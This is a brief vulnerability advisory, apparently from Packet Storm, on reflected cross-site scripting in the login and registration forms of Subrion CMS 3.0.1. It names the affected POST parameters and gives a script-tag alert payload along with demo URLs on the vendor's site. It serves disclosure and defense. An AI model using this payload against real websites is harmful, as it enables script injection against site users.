Subrion CMS version 3.0.1 suffers from a cross site scripting vulnerability.
0ac3ee7611ad37967de005d18613b45aa10427d650f86abe7306afdc16b9b311Subrion CMS 3.0.1. Multiple Cross Site Scripting Vulnerabilities
Author : syst3m_f4ult
Homepage : http://www.subrion.com/ <http://www.automne-cms.org/>
Vendor : subrion
Version : 3.0.1 (probably all versions)
Tested on : ubuntu 12.04
Date : 2013-10-10
-----------------------------------------------------------------------
I. POC & Exploit
-----------------------------------------------------------------------
Two pages are vulnerable to XSS (Method: POST):
http://localhost/login/ [username parameter]
http://localhost/registration/ [username and email parameters]
Malicious Code:
"><script>alert('syst3m_f4ult')</script>
Demo:
http://cms.subrion.com/login/
http://cms.subrion.com/registration/
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed